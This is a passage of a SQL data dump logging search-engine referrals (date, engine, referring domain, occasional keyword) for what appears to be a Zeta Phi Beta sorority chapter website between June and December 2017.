06-01','google','www.google.com','',5286),(592,'2017-06-03','google','www.google.com','',5347),(593,'2017-06-03','google','www.google.com','',5357),(594,'2017-06-04','google','www.google.com','',5380),(595,'2017-06-05','google','www.google.com','',5413),(596,'2017-06-05','google','www.google.com','',5417),(597,'2017-06-05','google','www.google.com','',5438),(598,'2017-06-06','google','www.google.com','',5452),(599,'2017-06-06','google','www.google.co.in','',5455),(600,'2017-06-06','google','www.google.com','',5458),(601,'2017-06-07','bing','www.bing.com','zeta phi beta lambda gamma zeta',5526),(602,'2017-06-08','google','www.google.com','',5570),(603,'2017-06-08','google','www.google.com','',5571),(604,'2017-06-09','google','www.google.com','',5618),(605,'2017-06-10','google','www.google.com','',5645),(606,'2017-06-10','google','www.google.com','',5661),(607,'2017-06-11','google','www.google.com','',5680),(608,'2017-06-12','google','www.google.com','',5741),(609,'2017-06-12','google','www.google.com','',5757),(610,'2017-06-13','google','www.google.com','',5844),(611,'2017-06-13','google','www.google.com','',5847),(612,'2017-06-14','google','google.com','',5899),(613,'2017-06-14','google','google.com','',5906),(614,'2017-06-14','google','www.google.com','',5908),(615,'2017-06-15','google','www.google.com','',5951),(616,'2017-06-16','google','google.com','',5975),(617,'2017-06-16','google','www.google.com','',5996),(618,'2017-06-16','google','www.google.com','',6018),(619,'2017-06-17','google','www.google.com','',6060),(620,'2017-06-17','google','www.google.com','',6061),(621,'2017-06-17','google','com.google.android.googlequicksearchbox','',6062),(622,'2017-06-17','google','www.google.com','',6067),(623,'2017-06-17','google','www.google.com','',6070),(624,'2017-06-17','google','www.google.com','',6071),(625,'2017-06-17','google','www.google.com','',6080),(626,'2017-06-17','google','com.google.android.googlequicksearchbox','',6082),(627,'2017-06-17','google','www.google.com','',6087),(628,'2017-06-17','google','www.google.com','',6088),(629,'2017-06-17','google','www.google.com','',6090),(630,'2017-06-18','google','www.google.com','',6103),(631,'2017-06-18','google','www.google.com','',6104),(632,'2017-06-18','google','www.google.com','',6134),(633,'2017-06-18','google','www.google.com','',6149),(634,'2017-06-19','google','www.google.com','',6218),(635,'2017-06-19','google','www.google.com','',6228),(636,'2017-06-19','google','www.google.com','',6239),(637,'2017-06-20','google','www.google.com','',6247),(638,'2017-06-20','google','www.google.com','',6288),(639,'2017-06-20','google','www.google.com','',6295),(640,'2017-06-20','google','www.google.com','',6302),(641,'2017-06-21','bing','www.bing.com','',6312),(642,'2017-06-21','google','www.google.com','',6314),(643,'2017-06-21','google','www.google.com','',6319),(644,'2017-06-21','google','www.google.com','',6325),(645,'2017-06-22','google','www.google.com','',6361),(646,'2017-06-22','google','www.google.com','',6367),(647,'2017-06-23','bing','www.bing.com','',6389),(648,'2017-06-23','google','www.google.com','',6393),(649,'2017-06-23','google','www.google.com','',6394),(650,'2017-06-24','google','www.google.com','',6420),(651,'2017-06-25','google','www.google.com','',6446),(652,'2017-06-25','google','www.google.com','',6451),(653,'2017-06-25','google','www.google.com','',6458),(654,'2017-06-26','google','www.google.com','',6508),(655,'2017-06-26','yahoo','search.yahoo.com','',6511),(656,'2017-06-27','google','www.google.at','Zeta Phi Beta',6527),(657,'2017-06-28','yandex','yandex.ru','',6574),(658,'2017-06-29','google','www.google.com','',6618),(659,'2017-06-29','yahoo','search.yahoo.com','',6627),(660,'2017-06-30','google','www.google.com','',6685),(661,'2017-07-01','google','www.google.com','',6723),(662,'2017-07-02','google','www.google.com','',6767),(663,'2017-07-02','google','www.google.com','',6772),(664,'2017-07-04','bing','www.bing.com','',6870),(665,'2017-07-04','google','www.google.com','',6880),(666,'2017-07-05','google','www.google.com','',6929),(667,'2017-07-05','google','www.google.com','',6954),(668,'2017-07-06','google','google.com','',6966),(669,'2017-07-06','google','www.google.com','',6987),(670,'2017-07-07','google','www.google.com','',7010),(671,'2017-07-07','google','www.google.com','',7024),(672,'2017-07-07','google','www.google.com','',7037),(673,'2017-07-08','google','www.google.com','',7052),(674,'2017-07-08','bing','www.bing.com','',7063),(675,'2017-07-09','google','www.google.com','',7139),(676,'2017-07-10','bing','www.bing.com','Lambda Gamma Zeta Chapter, Zeta Phi Beta Sorority, Inc.',7179),(677,'2017-07-10','yandex','yandex.ru','',7189),(678,'2017-07-10','google','google.com','',7191),(679,'2017-07-10','google','www.google.com','',7198),(680,'2017-07-11','google','www.google.com','',7226),(681,'2017-07-13','google','www.google.com','',7313),(682,'2017-07-13','google','www.google.com','',7315),(683,'2017-07-14','bing','www.bing.com','gamma zeta chapter of zeta phi beta',7349),(684,'2017-07-15','google','www.google.com','',7390),(685,'2017-07-15','google','www.google.com','',7393),(686,'2017-07-15','google','www.google.com','',7398),(687,'2017-07-16','google','www.google.com','',7436),(688,'2017-07-16','google','www.google.com','',7439),(689,'2017-07-17','google','www.google.com','',7489),(690,'2017-07-17','yandex','yandex.ru','',7505),(691,'2017-07-17','google','www.google.com','',7506),(692,'2017-07-18','yandex','yandex.ru','',7534),(693,'2017-07-18','google','www.google.com','',7556),(694,'2017-07-18','yandex','yandex.ru','',7560),(695,'2017-07-19','bing','www.bing.com','',7567),(696,'2017-07-19','google','www.google.com','',7586),(697,'2017-07-20','google','google.com','',7636),(698,'2017-07-20','bing','www.bing.com','',7640),(699,'2017-07-20','google','www.google.com','',7643),(700,'2017-07-22','google','www.google.com','',7751),(701,'2017-07-22','google','www.google.com','',7752),(702,'2017-07-22','google','www.google.com','',7770),(703,'2017-07-22','google','www.google.com','',7778),(704,'2017-07-23','google','www.google.com','',7800),(705,'2017-07-24','google','www.google.com','',7830),(706,'2017-07-24','google','www.google.com','',7859),(707,'2017-07-24','bing','www.bing.com','',7867),(708,'2017-07-24','google','www.google.com','',7871),(709,'2017-07-25','google','www.google.com','',7932),(710,'2017-07-25','google','www.google.com','',7939),(711,'2017-07-25','google','www.google.com','',7945),(712,'2017-07-26','google','www.google.com','',7974),(713,'2017-07-26','google','www.google.com','',7977),(714,'2017-07-27','google','www.google.com','',8003),(715,'2017-07-27','google','www.google.com','',8018),(716,'2017-07-28','google','www.google.com','',8072),(717,'2017-07-28','google','www.google.com','',8083),(718,'2017-07-28','google','www.google.com','',8089),(719,'2017-07-29','google','www.google.com','',8109),(720,'2017-07-30','google','www.google.com','',8132),(721,'2017-07-30','google','www.google.com','',8147),(722,'2017-07-30','google','www.google.com','',8149),(723,'2017-07-30','google','www.google.com','',8176),(724,'2017-07-30','google','www.google.com','',8178),(725,'2017-07-31','google','www.google.com','zeta phi beta Maryland 2017 events',8189),(726,'2017-07-31','google','www.google.com','',8198),(727,'2017-07-31','google','www.google.gr','',8219),(728,'2017-07-31','google','www.google.com.pk','',8224),(729,'2017-07-31','google','www.google.com.pk','',8226),(730,'2017-08-01','google','www.google.com','',8259),(731,'2017-08-01','google','www.google.com','',8268),(732,'2017-08-01','google','www.google.com','',8271),(733,'2017-08-01','google','www.google.com','',8278),(734,'2017-08-02','google','www.google.com','',8332),(735,'2017-08-02','google','www.google.com','',8339),(736,'2017-08-02','google','www.google.com','',8341),(737,'2017-08-02','yandex','yandex.ru','',8353),(738,'2017-08-03','google','www.google.com','',8400),(739,'2017-08-05','google','www.google.com','',8488),(740,'2017-08-05','yandex','yandex.ru','',8490),(741,'2017-08-05','google','www.google.com','',8493),(742,'2017-08-05','yandex','yandex.ru','',8497),(743,'2017-08-05','google','www.google.com','',8499),(744,'2017-08-06','google','www.google.com','',8532),(745,'2017-08-07','google','www.google.com','',8577),(746,'2017-08-07','google','www.google.com','',8629),(747,'2017-08-07','yandex','yandex.ru','',8661),(748,'2017-08-07','bing','www.bing.com','',8669),(749,'2017-08-08','google','google.com','',8710),(750,'2017-08-09','yandex','yandex.ru','',8731),(751,'2017-08-09','yandex','yandex.ru','',8738),(752,'2017-08-09','google','www.google.com','',8750),(753,'2017-08-10','google','www.google.com','',8775),(754,'2017-08-10','yandex','yandex.ru','',8783),(755,'2017-08-10','google','www.google.com','',8803),(756,'2017-08-10','yahoo','search.yahoo.com','',8809),(757,'2017-08-11','google','www.google.com','',8867),(758,'2017-08-11','yandex','yandex.ru','',8872),(759,'2017-08-11','yandex','yandex.ru','',8876),(760,'2017-08-11','google','www.google.com','',8883),(761,'2017-08-12','google','www.google.com','',8901),(762,'2017-08-12','yandex','yandex.ru','',8909),(763,'2017-08-12','google','www.google.com','',8925),(764,'2017-08-13','yandex','yandex.ru','',8950),(765,'2017-08-13','google','www.google.com','',8952),(766,'2017-08-13','bing','www.bing.com','zeta laura sanders of zeta phi beta',8967),(767,'2017-08-14','yandex','yandex.ru','',8991),(768,'2017-08-14','yandex','yandex.ru','',8997),(769,'2017-08-14','google','www.google.com','',8998),(770,'2017-08-14','google','www.google.com','',9001),(771,'2017-08-14','google','www.google.com','',9018),(772,'2017-08-14','yahoo','r.search.yahoo.com','',9026),(773,'2017-08-14','google','www.google.com','',9034),(774,'2017-08-15','google','www.google.com','',9060),(775,'2017-08-15','google','www.google.com','',9074),(776,'2017-08-15','google','www.google.com','',9078),(777,'2017-08-15','yandex','yandex.ru','',9079),(778,'2017-08-15','yandex','yandex.ru','',9082),(779,'2017-08-15','google','www.google.com','',9091),(780,'2017-08-16','google','www.google.com','',9163),(781,'2017-08-16','google','www.google.com','',9177),(782,'2017-08-17','yandex','yandex.ru','',9204),(783,'2017-08-17','yandex','yandex.ru','',9205),(784,'2017-08-17','google','www.google.com','',9225),(785,'2017-08-17','google','www.google.com','',9240),(786,'2017-08-18','google','www.google.com','',9292),(787,'2017-08-19','yandex','yandex.ru','',9314),(788,'2017-08-20','google','www.google.com','',9383),(789,'2017-08-21','google','www.google.com','',9432),(790,'2017-08-22','yandex','yandex.ru','',9458),(791,'2017-08-22','google','www.google.com','',9483),(792,'2017-08-22','google','www.google.com','',9487),(793,'2017-08-22','google','google.com','',9492),(794,'2017-08-22','yandex','yandex.ru','',9494),(795,'2017-08-23','google','www.google.com','',9549),(796,'2017-08-23','google','www.google.com','',9559),(797,'2017-08-23','yandex','yandex.ru','',9578),(798,'2017-08-24','google','www.google.com','',9595),(799,'2017-08-24','google','www.google.com','',9609),(800,'2017-08-25','yandex','yandex.ru','',9646),(801,'2017-08-25','google','www.google.com','',9662),(802,'2017-08-25','google','www.google.com','',9663),(803,'2017-08-26','google','www.google.com','',9709),(804,'2017-08-26','google','www.google.com','',9734),(805,'2017-08-26','google','com.google.android.googlequicksearchbox','',9753),(806,'2017-08-26','google','www.google.com','',9759),(807,'2017-08-27','yandex','yandex.ru','',9769),(808,'2017-08-27','bing','www.bing.com','',9771),(809,'2017-08-27','google','www.google.com','',9793),(810,'2017-08-27','google','www.google.com','',9800),(811,'2017-08-29','yandex','yandex.ru','',9930),(812,'2017-08-29','google','www.google.com','',9942),(813,'2017-08-29','google','www.google.com','',9972),(814,'2017-08-29','google','www.google.com','',9980),(815,'2017-08-30','yandex','yandex.ru','',9991),(816,'2017-08-30','google','www.google.com','',10017),(817,'2017-08-30','google','www.google.com','',10027),(818,'2017-08-31','yandex','yandex.ru','',10073),(819,'2017-08-31','google','www.google.com','',10095),(820,'2017-08-31','google','www.google.com','',10121),(821,'2017-08-31','google','www.google.com','',10122),(822,'2017-09-02','yandex','yandex.ru','',10181),(823,'2017-09-02','google','www.google.com','',10206),(824,'2017-09-03','yandex','yandex.ru','',10260),(825,'2017-09-03','google','www.google.com','',10275),(826,'2017-09-03','google','www.google.com','',10287),(827,'2017-09-03','yandex','yandex.ru','',10293),(828,'2017-09-04','google','www.google.com','',10335),(829,'2017-09-04','google','www.google.com','',10355),(830,'2017-09-05','google','www.google.com','',10419),(831,'2017-09-06','yandex','yandex.ru','',10450),(832,'2017-09-06','google','www.google.com','',10499),(833,'2017-09-07','google','www.google.com','',10556),(834,'2017-09-07','yandex','yandex.ru','',10559),(835,'2017-09-08','yandex','yandex.ru','',10596),(836,'2017-09-08','google','www.google.com','',10603),(837,'2017-09-08','google','www.google.com','',10611),(838,'2017-09-08','google','www.google.com','',10614),(839,'2017-09-09','yandex','yandex.ru','',10657),(840,'2017-09-09','google','www.google.com','',10670),(841,'2017-09-10','yandex','yandex.ru','',10706),(842,'2017-09-10','yandex','yandex.ru','',10759),(843,'2017-09-11','google','www.google.com','',10797),(844,'2017-09-11','google','www.google.com','',10801),(845,'2017-09-11','google','www.google.com','',10804),(846,'2017-09-11','google','www.google.com','',10810),(847,'2017-09-12','yandex','yandex.ru','',10849),(848,'2017-09-12','google','www.google.com','zphiblgz.org',10859),(849,'2017-09-12','google','www.google.com','',10861),(850,'2017-09-12','google','www.google.com','',10883),(851,'2017-09-12','bing','www.bing.com','',10884),(852,'2017-09-12','google','www.google.com','',10895),(853,'2017-09-12','yandex','yandex.ru','',10925),(854,'2017-09-13','google','www.google.com','',10944),(855,'2017-09-13','google','www.google.com','',10948),(856,'2017-09-13','google','www.google.com','',10970),(857,'2017-09-13','google','www.google.com','',10978),(858,'2017-09-13','yandex','yandex.ru','',10980),(859,'2017-09-14','yandex','yandex.ru','',11004),(860,'2017-09-14','google','www.google.com','',11054),(861,'2017-09-14','google','www.google.com','',11094),(862,'2017-09-15','yandex','yandex.ru','',11104),(863,'2017-09-15','google','www.google.com','',11123),(864,'2017-09-15','google','www.google.com','',11126),(865,'2017-09-15','google','www.google.com','',11139),(866,'2017-09-15','bing','www.bing.com','',11142),(867,'2017-09-16','google','www.google.com','',11174),(868,'2017-09-16','google','www.google.com','',11176),(869,'2017-09-16','google','www.google.com','',11179),(870,'2017-09-16','google','www.google.com','',11189),(871,'2017-09-17','yandex','yandex.ru','',11226),(872,'2017-09-17','google','www.google.com','',11233),(873,'2017-09-17','google','com.google.android.googlequicksearchbox','',11243),(874,'2017-09-17','yandex','yandex.ru','',11245),(875,'2017-09-17','bing','www.bing.com','zeta phi beta sorority inc-camden,sc',11249),(876,'2017-09-17','google','www.google.com','',11250),(877,'2017-09-18','google','www.google.com','',11288),(878,'2017-09-18','google','www.google.com','',11289),(879,'2017-09-18','bing','www.bing.com','zeta phi beta sorority inc-camden,sc',11291),(880,'2017-09-19','yahoo','search.yahoo.com','',11364),(881,'2017-09-20','yandex','yandex.ru','',11391),(882,'2017-09-20','yandex','yandex.ru','',11434),(883,'2017-09-21','yandex','yandex.ru','',11478),(884,'2017-09-21','google','www.google.com','',11495),(885,'2017-09-21','google','www.google.com','',11511),(886,'2017-09-21','google','www.google.com','',11512),(887,'2017-09-21','google','com.google.android.googlequicksearchbox','',11516),(888,'2017-09-22','yandex','yandex.ru','',11519),(889,'2017-09-22','yandex','yandex.ru','',11529),(890,'2017-09-22','google','google.com','',11541),(891,'2017-09-22','google','www.google.com','',11549),(892,'2017-09-22','google','www.google.com','',11551),(893,'2017-09-22','yandex','yandex.ru','',11558),(894,'2017-09-22','google','www.google.com','',11562),(895,'2017-09-23','yandex','yandex.ru','',11574),(896,'2017-09-23','google','www.google.com','',11591),(897,'2017-09-23','google','www.google.com','',11599),(898,'2017-09-24','yandex','yandex.ru','',11607),(899,'2017-09-24','yandex','yandex.ru','',11613),(900,'2017-09-24','google','www.google.com','',11617),(901,'2017-09-24','google','www.google.com','',11620),(902,'2017-09-25','bing','www.bing.com','',11651),(903,'2017-09-25','yandex','yandex.ru','',11660),(904,'2017-09-25','google','www.google.com','',11667),(905,'2017-09-25','google','www.google.com','',11668),(906,'2017-09-25','google','www.google.com','',11673),(907,'2017-09-25','google','www.google.com','',11678),(908,'2017-09-25','yandex','yandex.ru','',11687),(909,'2017-09-25','google','www.google.com','',11692),(910,'2017-09-26','yandex','yandex.ru','',11711),(911,'2017-09-26','google','www.google.com','',11712),(912,'2017-09-26','yandex','yandex.ru','',11714),(913,'2017-09-26','yandex','yandex.ru','',11726),(914,'2017-09-26','google','www.google.com','',11729),(915,'2017-09-26','google','com.google.android.googlequicksearchbox','',11743),(916,'2017-09-26','google','www.google.com','',11748),(917,'2017-09-27','yandex','yandex.ru','',11796),(918,'2017-09-27','google','www.google.com','',11810),(919,'2017-09-27','google','www.google.com','',11812),(920,'2017-09-28','yandex','yandex.ru','',11840),(921,'2017-09-28','yandex','yandex.ru','',11860),(922,'2017-09-28','google','www.google.com','',11864),(923,'2017-09-29','yandex','yandex.ru','',11919),(924,'2017-09-29','google','www.google.com','',11921),(925,'2017-09-29','google','www.google.com','',11922),(926,'2017-09-29','yandex','yandex.ru','',11930),(927,'2017-09-30','google','www.google.com','',11966),(928,'2017-09-30','google','www.google.com','',11968),(929,'2017-09-30','google','www.google.com','',11974),(930,'2017-09-30','google','www.google.com','',11980),(931,'2017-10-01','google','www.google.com','',12008),(932,'2017-10-01','google','www.google.com','',12015),(933,'2017-10-02','google','com.google.android.googlequicksearchbox','',12030),(934,'2017-10-02','google','www.google.com','',12045),(935,'2017-10-02','google','www.google.com','',12056),(936,'2017-10-02','google','www.google.com','',12062),(937,'2017-10-02','google','www.google.com','',12074),(938,'2017-10-03','google','google.com','',12085),(939,'2017-10-03','google','www.google.com','',12119),(940,'2017-10-04','google','www.google.com','',12151),(941,'2017-10-05','google','www.google.com','',12245),(942,'2017-10-05','google','www.google.com','',12264),(943,'2017-10-05','google','www.google.com','',12268),(944,'2017-10-06','google','www.google.com','',12300),(945,'2017-10-06','google','www.google.com','',12302),(946,'2017-10-06','google','www.google.com','',12306),(947,'2017-10-07','google','www.google.com','',12348),(948,'2017-10-07','yandex','yandex.ru','',12350),(949,'2017-10-07','google','www.google.com','',12370),(950,'2017-10-08','google','www.google.com','',12389),(951,'2017-10-08','google','www.google.com','',12413),(952,'2017-10-09','google','www.google.com','',12445),(953,'2017-10-10','google','www.google.com','',12489),(954,'2017-10-10','google','www.google.com','',12494),(955,'2017-10-10','google','www.google.com','',12499),(956,'2017-10-11','google','www.google.com','',12526),(957,'2017-10-11','google','www.google.com','',12539),(958,'2017-10-11','google','www.google.com','',12548),(959,'2017-10-12','google','www.google.com','',12574),(960,'2017-10-12','google','www.google.com.tw','',12612),(961,'2017-10-12','google','www.google.com','',12620),(962,'2017-10-12','google','www.google.com','',12625),(963,'2017-10-12','google','www.google.com','',12629),(964,'2017-10-12','google','www.google.com','',12642),(965,'2017-10-13','google','www.google.com','',12654),(966,'2017-10-13','google','www.google.com','',12669),(967,'2017-10-13','google','www.google.com','',12679),(968,'2017-10-13','google','www.google.com','',12680),(969,'2017-10-14','google','www.google.com','',12702),(970,'2017-10-14','google','google.com','',12734),(971,'2017-10-15','google','www.google.com','',12760),(972,'2017-10-15','google','www.google.com','zphiblgz.org',12772),(973,'2017-10-16','google','www.google.com','',12798),(974,'2017-10-16','google','www.google.com','',12800),(975,'2017-10-16','google','www.google.com','',12812),(976,'2017-10-17','google','www.google.com','',12855),(977,'2017-10-18','google','www.google.com','',12907),(978,'2017-10-18','duckduckgo','duckduckgo.com','',12919),(979,'2017-10-19','google','com.google.android.googlequicksearchbox','',12934),(980,'2017-10-19','google','www.google.com','',12947),(981,'2017-10-19','google','www.google.com','',12950),(982,'2017-10-20','google','www.google.com','',12983),(983,'2017-10-21','google','www.google.com','',13003),(984,'2017-10-21','google','www.google.com','',13004),(985,'2017-10-21','google','www.google.com','',13015),(986,'2017-10-22','google','www.google.com','',13025),(987,'2017-10-22','google','www.google.com','',13030),(988,'2017-10-22','google','www.google.com','',13038),(989,'2017-10-23','google','www.google.co.jp','',13052),(990,'2017-10-23','google','www.google.com','',13066),(991,'2017-10-24','google','www.google.com','',13089),(992,'2017-10-24','google','www.google.com','',13099),(993,'2017-10-24','google','www.google.co.jp','',13115),(994,'2017-10-25','google','www.google.com','',13161),(995,'2017-10-25','google','www.google.com','',13164),(996,'2017-10-26','google','www.google.com','',13203),(997,'2017-10-26','yahoo','search.yahoo.com','',13210),(998,'2017-10-26','google','www.google.com','',13216),(999,'2017-10-26','google','www.google.com','',13219),(1000,'2017-10-26','google','www.google.com','',13228),(1001,'2017-10-27','google','www.google.com','',13250),(1002,'2017-10-27','google','www.google.com','',13251),(1003,'2017-10-27','google','www.google.com','',13253),(1004,'2017-10-28','yandex','yandex.ru','',13284),(1005,'2017-10-28','google','www.google.com','',13286),(1006,'2017-10-28','google','www.google.com','',13291),(1007,'2017-10-28','google','www.google.com','',13298),(1008,'2017-10-28','google','www.google.com','',13310),(1009,'2017-10-29','google','www.google.com','',13324),(1010,'2017-10-29','google','www.google.com','',13329),(1011,'2017-10-29','google','www.google.com','',13330),(1012,'2017-10-30','google','com.google.android.googlequicksearchbox','',13350),(1013,'2017-10-30','google','www.google.com','',13356),(1014,'2017-10-30','google','www.google.com','',13362),(1015,'2017-10-31','yahoo','search.yahoo.com','',13368),(1016,'2017-10-31','google','www.google.com','',13376),(1017,'2017-10-31','google','www.google.com','',13383),(1018,'2017-10-31','google','www.google.com','',13385),(1019,'2017-10-31','google','www.google.com','',13389),(1020,'2017-10-31','bing','www.bing.com','',13390),(1021,'2017-10-31','google','www.google.com','',13392),(1022,'2017-11-01','google','www.google.com','zeta phi beta',13418),(1023,'2017-11-01','google','www.google.com','',13425),(1024,'2017-11-01','google','www.google.com','',13429),(1025,'2017-11-01','google','www.google.com','',13430),(1026,'2017-11-02','google','www.google.com','',13438),(1027,'2017-11-02','google','www.google.com','',13446),(1028,'2017-11-02','google','www.google.com','',13451),(1029,'2017-11-03','google','www.google.com','',13460),(1030,'2017-11-03','google','www.google.com','',13476),(1031,'2017-11-03','google','www.google.com','',13483),(1032,'2017-11-03','google','www.google.com','',13487),(1033,'2017-11-03','google','www.google.com','',13493),(1034,'2017-11-03','google','www.google.com','',13500),(1035,'2017-11-03','google','www.google.com','',13501),(1036,'2017-11-04','google','www.google.com','',13529),(1037,'2017-11-04','google','www.google.com','',13542),(1038,'2017-11-05','google','www.google.com','',13548),(1039,'2017-11-05','google','www.google.com','',13560),(1040,'2017-11-06','google','google.com','',13575),(1041,'2017-11-06','google','www.google.com','',13582),(1042,'2017-11-06','google','www.google.com','',13585),(1043,'2017-11-06','google','www.google.com','',13593),(1044,'2017-11-06','google','www.google.com','',13595),(1045,'2017-11-06','google','www.google.com','',13601),(1046,'2017-11-07','google','com.google.android.googlequicksearchbox','',13726),(1047,'2017-11-07','google','www.google.com','',13741),(1048,'2017-11-07','google','www.google.com','',13745),(1049,'2017-11-08','google','www.google.com','',13827),(1050,'2017-11-08','bing','www.bing.com','',13833),(1051,'2017-11-08','google','www.google.com','',13842),(1052,'2017-11-08','google','www.google.com','',13845),(1053,'2017-11-09','google','www.google.com','',13856),(1054,'2017-11-09','google','www.google.com','',13861),(1055,'2017-11-09','google','www.google.com','',13870),(1056,'2017-11-09','google','www.google.com','',13875),(1057,'2017-11-10','yandex','yandex.ru','',13902),(1058,'2017-11-10','google','www.google.com','',13903),(1059,'2017-11-10','google','www.google.com','',13918),(1060,'2017-11-10','google','www.google.com','',13921),(1061,'2017-11-11','google','www.google.com','',13940),(1062,'2017-11-11','bing','www.bing.com','history of Gamma Chapter of Zeta Phi Beta%2C Morgann State',13941),(1063,'2017-11-11','google','www.google.com','',13947),(1064,'2017-11-11','google','www.google.com','',13953),(1065,'2017-11-11','google','www.google.com','',13966),(1066,'2017-11-12','google','www.google.com','',13970),(1067,'2017-11-12','google','www.google.com','',13981),(1068,'2017-11-12','google','www.google.com','',13982),(1069,'2017-11-13','google','www.google.com','',13999),(1070,'2017-11-13','google','www.google.com','',14030),(1071,'2017-11-14','google','www.google.com','',14055),(1072,'2017-11-14','google','www.google.com','',14059),(1073,'2017-11-14','google','www.google.com','',14062),(1074,'2017-11-14','google','www.google.com','',14063),(1075,'2017-11-14','google','www.google.com','',14065),(1076,'2017-11-14','google','www.google.com','',14075),(1077,'2017-11-15','google','www.google.com','',14096),(1078,'2017-11-15','google','www.google.com','',14098),(1079,'2017-11-15','google','www.google.com','',14103),(1080,'2017-11-16','google','www.google.com','',14111),(1081,'2017-11-16','google','www.google.com','',14124),(1082,'2017-11-16','google','www.google.com','',14125),(1083,'2017-11-17','google','www.google.com','',14153),(1084,'2017-11-17','google','www.google.com','',14156),(1085,'2017-11-17','google','www.google.com','',14157),(1086,'2017-11-17','google','www.google.com','',14158),(1087,'2017-11-18','google','www.google.com','',14165),(1088,'2017-11-18','google','www.google.com','',14182),(1089,'2017-11-18','google','www.google.com','',14183),(1090,'2017-11-19','google','www.google.com','',14197),(1091,'2017-11-19','google','www.google.com','',14218),(1092,'2017-11-20','google','www.google.com','',14240),(1093,'2017-11-20','google','www.google.com','',14243),(1094,'2017-11-20','google','www.google.com','',14244),(1095,'2017-11-20','google','www.google.com','',14248),(1096,'2017-11-20','google','www.google.com','',14249),(1097,'2017-11-20','google','www.google.com','',14255),(1098,'2017-11-20','google','www.google.com','',14258),(1099,'2017-11-20','google','www.google.com','',14265),(1100,'2017-11-20','google','www.google.com','',14266),(1101,'2017-11-21','yandex','yandex.ru','',14273),(1102,'2017-11-21','google','www.google.com','',14275),(1103,'2017-11-21','google','www.google.com','',14278),(1104,'2017-11-21','google','www.google.com','',14293),(1105,'2017-11-22','baidu','www.baidu.com','V4L3',14296),(1106,'2017-11-22','google','www.google.com','',14301),(1107,'2017-11-22','yahoo','us.search.yahoo.com','',14304),(1108,'2017-11-22','google','www.google.com','',14310),(1109,'2017-11-22','google','www.google.com','',14314),(1110,'2017-11-22','google','www.google.com','',14328),(1111,'2017-11-23','google','www.google.com','',14343),(1112,'2017-11-23','google','www.google.com','',14351),(1113,'2017-11-23','google','www.google.co.jp','',14358),(1114,'2017-11-24','google','www.google.com','',14373),(1115,'2017-11-24','yandex','yandex.ru','',14379),(1116,'2017-11-25','google','www.google.com','',14396),(1117,'2017-11-25','bing','www.bing.com','',14398),(1118,'2017-11-25','google','www.google.com','',14399),(1119,'2017-11-26','google','www.google.com','',14435),(1120,'2017-11-26','google','www.google.com','',14438),(1121,'2017-11-27','google','www.google.com','',14470),(1122,'2017-11-27','google','google.com','',14475),(1123,'2017-11-27','google','www.google.com','',14476),(1124,'2017-11-27','google','www.google.com','',14477),(1125,'2017-11-27','google','www.google.com','',14480),(1126,'2017-11-27','google','www.google.com','',14482),(1127,'2017-11-28','google','www.google.com','',14525),(1128,'2017-11-28','google','www.google.com','',14526),(1129,'2017-11-28','google','www.google.com','',14532),(1130,'2017-11-28','google','www.google.com','',14533),(1131,'2017-11-29','google','www.google.com','',14551),(1132,'2017-11-29','baidu','www.baidu.com','C2HS',14577),(1133,'2017-11-29','google','www.google.com','',14582),(1134,'2017-11-29','google','www.google.com','',14601),(1135,'2017-11-30','google','google.com','',14618),(1136,'2017-11-30','google','www.google.com','',14633),(1137,'2017-11-30','google','www.google.com','',14636),(1138,'2017-11-30','google','www.google.com','',14648),(1139,'2017-11-30','google','www.google.com','',14649),(1140,'2017-12-01','google','www.google.com','',14669),(1141,'2017-12-01','google','www.google.com','',14681),(1142,'2017-12-01','google','www.google.com','',14683),(1143,'2017-12-01','google','www.google.com','',14691),(1144,'2017-12-02','google','www.google.com','',14720),(1145,'2017-12-02','google','www.google.com','',14724),(1146,'2017-12-03','google','www.google.com','',14745),(1147,'2017-12-03','google','www.google.com','',14758),(1148,'2017-12-03','google','www.google.com','',14769),(1149,'2017-12-03','google','www.google.com','',14779),(1150,'2017-12-04','google','www.google.com','',14796),(1151,'2017-12-04','google','www.google.com','',14797),(1152,'2017-12-04','google','www.google.com','',14815),(1153,'2017-12-04','google','www.google.com','',14817),(1154,'2017-12-04','google','www.google.com','',14840),(1155,'2017-12-04','google','www.google.com','',14842),(1156,'2017-12-04','google','www.google.com','',14843),(1157,'2017-12-05','google','www.google.com','',14864),(1158,'2017-12-05','google','www.google.com','',14869),(1159,'2017-12-06','google','www.google.com','',14889),(1160,'2017-12-06','google','www.google.com','',14941),(1161,'2017-12-06','google','www.google.com','',14956),(1162,'2017-12-06','google','www.google.com','',14957),(1163,'2017-12-06','google','www.google.com','',14985),(1164,'2017-12-07','google','www.google.com','',15014),(1165,'2017-12-07','google','www.google.com','',15015),(1166,'2017-12-07','google','www.google.com','',15019),(1167,'2017-12-07','google','www.google.com','',15022),(1168,'2017-12-07','google','www.google.com','',15028),(1169,'2017-12-07','google','www.google.com','',15032),(1170,'2017-12-08','yandex','yandex.ru','',15043),(1171,'2017-12-09','google','www.google.com','',15109),(1172,'2017-12-09','google','www.google.com','',15110),(1173,'2017-12-09','google','www.google.com','',15112),(1174,'2017-12-09','google','www.google.com','',15114),(1175,'2017-12-09','google','www.google.com','',15119),(1176,'2017-12-09','google','www.google.com','',15120),(1177,'2017-12-09','google','www.google.com','',15128),(1178,'2017-12-10','yandex','yandex.ru','',15144),(1179,'2017-12-11','google','www.google.com','',15177),(1180,'2017-12-11','google','www.google.com','',15180),(1181,'2017-12-11','google','com.google.android.googlequicksearchbox','',15181),(1182,'2017-12-11','google','www.google.com','',15188),(1183,'2017-12-11','google','www.google.com','',15198),(1184,'2017-12-11','google','www.google.com','',15199),(1185,'2017-12-12','google','www.google.com','',15285),(1186,'2017-12-12','yahoo','search.yahoo.com','',15287),(1187,'2017-12-12','google','www.google.com','',15301),(1188,'2017-12-12','google','www.google.com','',15305),(1189,'2017-12-13','google','www.google.com','',15366),(1190,'2017-12-13','google','www.google.com','',15414),(1191,'2017-12-13','google','www.google.com','',15415),(1192,'2017-12-13','google','www.google.com','',15416),(1193,'2017-12-14','yandex','yandex.ru','',15438),(1194,'2017-12-14','google','www.google.com','',15456),(1195,'2017-12-14','google','www.google.com','',15471),(1196,'2017-12-14','google','www.google.com','',15474),(1197,'2017-12-15','google','www.google.com','',15515),(1198,'2017-12-15','google','www.google.com','',15525),(1199,'2017-12-16','google','google.com','',15567),(1200,'2017-12-16','google','www.google.com','',15581),(1201,'2017-12-16','yandex','yandex.ru','',15592),(1202,'2017-12-17','google','www.google.com','',15627),(1203,'2017-12-17','google','www.google.com','',15630),(1204,'2017-12-18','google','www.google.com','',15656),(1205,'2017-12-18','google','www.google.com','',15669),(1206,'